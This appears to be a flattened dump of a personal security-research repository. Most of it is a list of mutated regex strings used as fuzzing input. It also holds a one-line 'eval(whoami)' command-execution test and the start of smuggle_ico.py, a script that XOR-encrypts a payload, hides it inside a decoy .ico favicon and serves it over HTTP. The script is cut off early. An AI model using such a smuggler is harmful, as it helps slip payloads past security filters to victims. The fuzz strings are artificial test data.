"xyz?" 24 | "xyz??" 25 | "xyz{0,1}" 26 | "xyz{0,1}?" 27 | "xyz{93}" 28 | "xyz{1,32}" 29 | "xyz{1,32}?" 30 | "xyz{1,}" 31 | "xyz{1,}?" 32 | "a\\fb\\nc\\rd\\te\\vf" 33 | "a\\nb\\bc" 34 | "(?:foo)" 35 | "(?: foo )" 36 | "foo|(bar|baz)|quux" 37 | "foo(?=bar)baz" 38 | "foo(?!bar)baz" 39 | "foo(?<=bar)baz" 40 | "foo(?)" 228 | "(?.)" 229 | "(?.)\\k" 230 | "\\p{Script=Greek}" 231 | "\\P{sc=Greek}" 232 | "\\p{Script_Extensions=Greek}" 233 | "\\P{scx=Greek}" 234 | "\\p{General_Category=Decimal_Number}" 235 | "\\P{gc=Decimal_Number}" 236 | "\\p{gc=Nd}" 237 | "\\P{Decimal_Number}" 238 | "\\p{Nd}" 239 | "\\P{Any}" 240 | "\\p{Changes_When_NFKC_Casefolded}" 241 | "L~" 242 | "P{scx=Greek}??" 243 | "Q~" 244 | "R??" 245 | "R!??oo(E=?ar)baz-" 246 | "Sc?Sc{?{?" 247 | "U~" 248 | "V~" 249 | "W~" 250 | "Xdtc" 251 | "X~" 252 | "X?" 253 | "[-123],}" 254 | "[-????]+,}" 255 | "[00011],}" 256 | "[011],}" 257 | "[0],}" 258 | "[1111],}" 259 | "[111],}" 260 | "[118],}" 261 | "[11],}" 262 | "[11a],}" 263 | "[[]{}()%^# ],}" 264 | "[]" 265 | "[],}" 266 | "[]{}()%^# ,}" 267 | "[^123],}" 268 | "[a-b-c],}" 269 | "[a-zA-Z0-9],}" 270 | "[b" 271 | "[bfoo(?!bar)baz" 272 | "[c!],}" 273 | "[c1],}" 274 | "[cA],}" 275 | "[cZ],}" 276 | "[c_],}" 277 | "[ca],}" 278 | "[cz],}" 279 | "[c~],}" 280 | "[c~]w" 281 | "[d-d],}" 282 | "[d-z],}" 283 | "[u???[11<([c?]?:u??)dccc]" 284 | "[ud808udf45-ud809udccc],}" 285 | "[x" 286 | "[x],}" 287 | "[xdz],}" 288 | "[xyz],}" 289 | "[x?" 290 | "[x?n4n4" 291 | "[x??19?" 292 | "[z-d],}" 293 | "[~?" 294 | "[?????" 295 | "[?" 296 | "[???],}" 297 | "[????-????],}" 298 | "[????" 299 | "]" 300 | "],}" 301 | "]QrC[w~]Qr" 302 | "]}" 303 | "]~" 304 | "^?000???????????????????????????x60?" 305 | "^12(a(?:1(b12))2)1dyb?9" 306 | "^xi!q" 307 | "^xxx$,}" 308 | "abc" 309 | "abc60,0}?{?" 310 | "aic" 311 | "b~" 312 | "c" 313 | "c!,}" 314 | "c,}" 315 | "cA,}" 316 | "c_,}" 317 | "cjcJcicIckcK,}" 318 | "c~" 319 | "c~,}" 320 | "d" 321 | "d?" 322 | "d??" 323 | "d(?:ab[]?9}" 324 | "dpN?(?.)?" 325 | "duu{123a?" 326 | "d{1,9" 327 | "d~" 328 | "e" 329 | "e~" 330 | "e?}" 331 | "f~" 332 | "g~" 333 | "h~" 334 | "i~" 335 | "j~" 336 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xx?~" 337 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxb~" 338 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxc~" 339 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxd~" 340 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxe~" 341 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxf~" 342 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxg~" 343 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxh~" 344 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxi~" 345 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxj~" 346 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxk~" 347 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxl~" 348 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxm~" 349 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxn~" 350 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxo~" 351 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxp~" 352 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxq~" 353 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxr~" 354 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxs~" 355 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxt~" 356 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxu~" 357 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxv~" 358 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxw~" 359 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxx~" 360 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxy~" 361 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxz~" 362 | "k?@a??=bbC?:!k?x!k0}??@??@a(P=b@??s@xx?~" 363 | "k?@a??=bbC?:!k?x!k0}??@??@a(P=b@??s@xxn~" 364 | "k?@a??=bbC?:!k?x!k0}??@??@a(P=b@??s@xxo~" 365 | "k?@a??=bbC?:!k?x!k0}??@??@a(P=b@??s@xxp~" 366 | "k?@a??=bbC?:!k?x!k0}??@??@a(P=b@??s@xxq~" 367 | "k?@a??=bbC?:!k?x!k0}??@??@a(P=b@??s@xxr~" 368 | "k?@a??=bbC?:!k?x!k0}??@??@a(P=b@??s@xxs~" 369 | "k?@a??=bbC?:!k?x!k0}??@??@a(P=b@??s@xxt~" 370 | "k?@a??=bbC?:!k?x!k0}??@??@a(P=b@??s@xxu~" 371 | "k?@a??=bbC?:!k?x!k0}??@??@a(P=b@??s@xxv~" 372 | "k?@a??=bbC?:!k?x!k0}??@??@a(P=b@??s@xxw~" 373 | "k?@a??=bbC?:!k?x!k0}??@??@a(P=b@??s@xxx~" 374 | "k?@a??=bbC?:!k?x!k0}??@??@a(P=b@??s@xxy~" 375 | "k?@a??=bbC?:!k?x!k0}??@??@a(P=b@??s@xxz~" 376 | "k?@a(?=bbb.~" 377 | "k?@a(?=bbbb~" 378 | "k?@a(?=bbbc~" 379 | "k?@a(?=bbbd~" 380 | "k?@a(?=bbbe~" 381 | "k?@a(?=bbbf~" 382 | "k?@a(?=bbbg~" 383 | "k?@a(?=bbbh~" 384 | "k?@a(?=bbbi~" 385 | "k?@a(?=bbbj~" 386 | "k?@a(?=bbbk~" 387 | "k?@a(?=bbbl~" 388 | "k?@a(?=bbbm~" 389 | "k?@a(?=bbbn~" 390 | "k?@a(?=bbbo~" 391 | "k?@a(?=bbbp~" 392 | "k?@a(?=bbbq~" 393 | "k?@a(?=bbbr~" 394 | "k?@a(?=bbbs~" 395 | "k?@a(?=bbbt~" 396 | "k?@a(?=bbbu~" 397 | "k?@a(?=bbbv~" 398 | "k?@a(?=bbbw~" 399 | "k?@a(?=bbbx~" 400 | "k?@a(?=bbby~" 401 | "k?@a(?=bbbz~" 402 | "k?@a(?=by?bC?:!k??????????????b~" 403 | "k?@a(?=by?bC?:!k??????????????c~" 404 | "k?@a(?=by?bC?:!k??????????????d~" 405 | "k?@a(?=by?bC?:!k??????????????e~" 406 | "k?@a(?=by?bC?:!k??????????????f~" 407 | "k?@a(?=by?bC?:!k??????????????g~" 408 | "k?@a(?=by?bC?:!k??????????????h~" 409 | "k?@a(?=by?bC?:!k??????????????i~" 410 | "k?@a(?=by?bC?:!k??????????????j~" 411 | "k?@a(?=by?bC?:!k??????????????k~" 412 | "k?@a(?=by?bC?:!k??????????????l~" 413 | "k?@a(?=by?bC?:!k??????????????m~" 414 | "k?@a(?=by?bC?:!k??????????????n~" 415 | "k?@a(?=by?bC?:!k??????????????o~" 416 | "k?@a(?=by?bC?:!k??????????????p~" 417 | "k?@a(?=by?bC?:!k??????????????q~" 418 | "k?@a(?=by?bC?:!k??????????????r~" 419 | "k?@a(?=by?bC?:!k??????????????s~" 420 | "k?@a(?=by?bC?:!k??????????????t~" 421 | "k?@a(?=by?bC?:!k??????????????u~" 422 | "k?@a(?=by?bC?:!k??????????????v~" 423 | "k?@a(?=by?bC?:!k??????????????w~" 424 | "k?@a(?=by?bC?:!k??????????????x~" 425 | "k?@a(?=by?bC?:!k??????????????y~" 426 | "k?@a(?=by?bC?:!k??????????????z~" 427 | "k?@a(?=by?bC?:!k???????????????~" 428 | "k?@a(?~" 429 | "k?@a(b~" 430 | "k?@a(c~" 431 | "k?@a(d~" 432 | "k?@a(e~" 433 | "k?@a(f~" 434 | "k?@a(g~" 435 | "k?@a(h~" 436 | "k?@a(i~" 437 | "k?@a(j~" 438 | "k?@a(k~" 439 | "k?@a(l~" 440 | "k?@a(m~" 441 | "k?@a(n~" 442 | "k?@a(o~" 443 | "k?@a(p~" 444 | "k?@a(q~" 445 | "k?@a(r~" 446 | "k?@a(s~" 447 | "k?@a(t~" 448 | "k?@a(u~" 449 | "k?@a(v~" 450 | "k?@a(w~" 451 | "k?@a(x~" 452 | "k?@a(y~" 453 | "k?@a(z~" 454 | "k0X@ab~" 455 | "k0X@ac~" 456 | "k0X@ad~" 457 | "k0X@ae~" 458 | "k0X@af~" 459 | "k0X@ag~" 460 | "k0X@ah~" 461 | "k0X@ai~" 462 | "k0X@aj~" 463 | "k0X@ak~" 464 | "k0X@al~" 465 | "k0X@am~" 466 | "k0X@an~" 467 | "k0X@ao~" 468 | "k0X@ap~" 469 | "k0X@aq~" 470 | "k0X@ar~" 471 | "k0X@as~" 472 | "k0X@at~" 473 | "k0X@au~" 474 | "k0X@av~" 475 | "k0X@aw~" 476 | "k0X@ax~" 477 | "k0X@ay~" 478 | "k0X@az~" 479 | "k0X@a?~" 480 | "k~" 481 | "l~" 482 | "m~" 483 | "n~" 484 | "o~" 485 | "p~" 486 | "q,}" 487 | "q~" 488 | "r~" 489 | "r?[c~]" 490 | "s~" 491 | "t~" 492 | "u0034,}" 493 | "u003z,}" 494 | "u0060,}" 495 | "ud808udf45*,}" 496 | "u~" 497 | "v~" 498 | "w" 499 | "w~" 500 | "x3z,}" 501 | "x60,}" 502 | "xyz?9" 503 | "x~" 504 | "y~" 505 | "z~" 506 | "{" 507 | "{??" 508 | "{ ,,?" 509 | "{-" 510 | "{0,d?????!" 511 | "{12345}pu{234:P}?" 512 | "{1?5" 513 | "{@" 514 | "{M,??" 515 | "{M,P{scx=Greek}???sn" 516 | "{M,??" 517 | "{M,??" 518 | "{M,?M,??" 519 | "{O" 520 | "{r~" 521 | "{s~" 522 | "{t~" 523 | "{u~" 524 | "{v~" 525 | "{w~" 526 | "{x~" 527 | "{y~" 528 | "{z~" 529 | "{}" 530 | "{}~" 531 | "{??@" 532 | "{?~" 533 | "},}" 534 | "}}" 535 | "}}}}}?}!}}}}}}}}}}}}}}}}}?},}" 536 | "}~" 537 | "}?w~???" 538 | "~~" 539 | "?!~" 540 | "?$" 541 | "?*?9?nnRnnn?" 542 | "?.~" 543 | "?123222222??" 544 | "?:??" 545 | "?R" 546 | "?b~" 547 | "?c~" 548 | "?d~" 549 | "?d???" 550 | "?e~" 551 | "?f~" 552 | "?g~" 553 | "?h~" 554 | "?i~" 555 | "?j~" 556 | "?k~" 557 | "?l~" 558 | "?m~" 559 | "?n~" 560 | "?o~" 561 | "?p~" 562 | "?q~" 563 | "?r~" 564 | "?s~" 565 | "?t~" 566 | "?u~" 567 | "?v~" 568 | "?v~?v" 569 | "?w~" 570 | "?x~" 571 | "?y~" 572 | "?z~" 573 | "?}" 574 | "??~" 575 | "?????????dadi(?!bbb" 576 | "??~" 577 | "k?@a??=bbC?:!k?x!k0}??@???@a(P=b@??s@xxq~>>>>>>>>>>>>>>>>>>" 578 | "?f??123222222??" 579 | "?fP{gc=Decimal_Number}" 580 | "?f2jq?oo@ooooh??" 581 | "?[???],}f?" 582 | "?[???],}nbbc2jocom" 583 | "?[]" 584 | "?[],}?" 585 | "?[],}f?" 586 | "?[]f?" 587 | "?[]{}()%^#" 588 | "?[^123],}f?" 589 | "?[^123]nbbc2jocom" 590 | "?[a-b-c],}f?" 591 | "?[a-b-c]nbbc2jocom" 592 | "?[a-zA-Z0-9],}f?" 593 | "?[a-zA-Z0-9],}jocom" 594 | "?[a-zA-Z0-9]c2jocom" 595 | "?[bfoo(?!bar)bazcom" 596 | "?[bfoo(?!bar)bazf?" 597 | "(?!10(?:\\.\\d{1,3}){3})" 598 | "(?!127(?:\\.\\d{1,3}){3})" 599 | "(?!(10|127)(?:\\.\\d{1,3}){3})" 600 | -------------------------------------------------------------------------------- /sample.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/sample.pdf -------------------------------------------------------------------------------- /sample.sh: -------------------------------------------------------------------------------- 1 | eval(whoami) 2 | -------------------------------------------------------------------------------- /sample_wav.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/sample_wav.zip -------------------------------------------------------------------------------- /sax.tar.xz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/sax.tar.xz -------------------------------------------------------------------------------- /smuggle_ico.py: -------------------------------------------------------------------------------- 1 | # @RandomDhiraj 2 | 3 | from struct import pack, unpack 4 | import os 5 | import mimetypes 6 | from http.server import HTTPServer, SimpleHTTPRequestHandler 7 | import sys 8 | import argparse 9 | 10 | def xor_encrypt(data, key=0x55, chunk_size=1024): 11 | return bytes([b ^ key for b in data]) 12 | 13 | def create_payload_ico(payload, original_filename, output_file="fav.ico"): 14 | decoy_header = pack('